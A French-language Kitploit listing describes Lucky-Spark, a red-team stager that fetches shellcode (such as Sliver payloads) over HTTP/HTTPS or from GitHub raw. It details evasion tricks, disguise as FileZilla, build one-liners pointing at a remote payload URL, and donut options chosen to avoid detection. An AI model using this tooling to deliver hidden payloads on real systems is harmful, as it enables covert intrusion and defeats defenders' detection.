Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Lucky-Spark — Un stager furtif conçu pour des charges utiles de shellcode mises en scène via http/https comme Sliver, ou sur github raw. | Kitploit
Outils/GitHubGitHub/schich/lucky-spark
ExploitationShellcodePost-ExploitationAnalyse de MalwareTests d'IntrusionCommandement et ContrôleAnalyse de BinairesRed TeamingDéveloppement de Charges Utiles
GitHubschich/lucky-spark

Lucky-Spark

Un stager furtif conçu pour des charges utiles de shellcode mises en scène via http/https comme Sliver, ou sur github raw.

5882il y a 1 moisVérifié par Kitploit
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

LUCKY-SPARK

⟪ LUCKY-SPARK ⟫ est un stager conçu pour les payloads shellcode hébergées via http/https comme Sliver ou sur github raw. Il utilise des méthodes modernes d'obfuscation et d'évasion comme le déchiffrement juste-à-temps par fenêtre glissante de la payload et le patchage d'instructions CPU. Par défaut, il crée un exécutable se faisant passer pour le client FTP FileZilla.


Fonctionnalités

  • Chargeur de payload Sliver stagée Télécharge et exécute une payload Sliver depuis un serveur spécifié.
  • Déchiffrement JIT du shellcode Ne déchiffre qu'une fenêtre glissante de la payload pour minimiser l'exposition.
  • Exécution basée sur les fibres Exécute le shellcode dans des fibres pour améliorer la furtivité et compliquer l'analyse.
  • Résolution dynamique des API Les fonctions API Windows suspectes ou sujettes à détection sont chargées dynamiquement à l'exécution.
  • Obfuscation des chaînes Les chaînes sensibles (ex. : URLs, user agents) sont chiffrées à l'aide d'un chiffrement affine et stockées de manière obfusquée dans le binaire compilé.
  • Patchage d'instructions CPU Les instructions CPU AES sont cachées derrière des instructions CPU anodines comme pmulqd et patchées après l'exécution.
  • Déguisement automatique L'EXE est automatiquement déguisé en FileZilla avec un manifeste, des informations de version et des icônes appropriés.
  • User-Agent personnalisable Prend en charge la spécification d'une chaîne User-Agent personnalisée pour les requêtes réseau.

Installation

Clonez ou téléchargez le dépôt et assurez-vous d'avoir et installés sur votre système.

make
mingw
root@kitploit:~
git clone <repository_url>
cd LUCKY-SPARK

Utilisation

Interactif

Exécutez le script de création du binaire.

root@kitploit:~
./luckySpark.sh

Il vous sera demandé de saisir l'URL de votre payload stagée et un User-Agent facultatif. Interactif

Une ligne

Peut être exécuté en une seule ligne pour pouvoir être intégré dans des scripts :

root@kitploit:~
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

Une ligne

Suggestions de Payload

Si vous utilisez donut ou Sliver (qui utilise donut), je recommande ces options pour créer la payload :

root@kitploit:~
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin

Cela évite un comportement suspect et signalé de la part de donut. Ironiquement, c'est surtout l'évasion de donut qui est fortement signalée.

Exécuter le Loader

Ceci crée un binaire filezilla.exe qui, une fois exécuté, récupère et exécute la payload.


Staging d'une Payload

Ce stager a été conçu pour être utilisé avec Sliver. Stagiez une payload Sliver comme décrit ici Sliver Staging Ne chiffrez pas la payload.

Mais toute méthode de staging basée sur http/https fonctionnera. comme python3 -m http.server ou une payload téléchargée sur github.com dans un dépôt public.

Ce stager ne prend PAS en charge le protocole de staging meterpreter.


Fenêtre Glissante JITD

root@kitploit:~
Step 1: RIP hits Page 0 and Page 0 gets decrypted 
  Pages:           [  D  |  E  |  E  | ... ]
  RIP ->              ^

Step 2: RIP hits Page 1 and Page 1 gets decrypted 
  Pages:           [  D  |  D  |  E  | ... ]
  RIP ->                    ^

Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
  Pages:           [  E  |  D  |  D  | ... ]
  RIP ->                          ^

Comment cela fonctionne :

  1. Lorsque RIP atteint une page protégée, le gestionnaire VEH déchiffre cette page.
  2. La page la plus ancienne de la fenêtre de 3 pages est rechiffrée.
  3. Seules les deux dernières pages sont déchiffrées, le reste reste protégé.
  4. Cette « fenêtre glissante » se déplace avec RIP à mesure que le code s'exécute.

VT


Sécurité et Avertissement

LUCKY-SPARK est destiné uniquement à des fins éducatives, de recherche et de tests d'intrusion autorisés. Toute utilisation non autorisée contre des systèmes sans permission est illégale et contraire à l'éthique.


Télécharger l’outil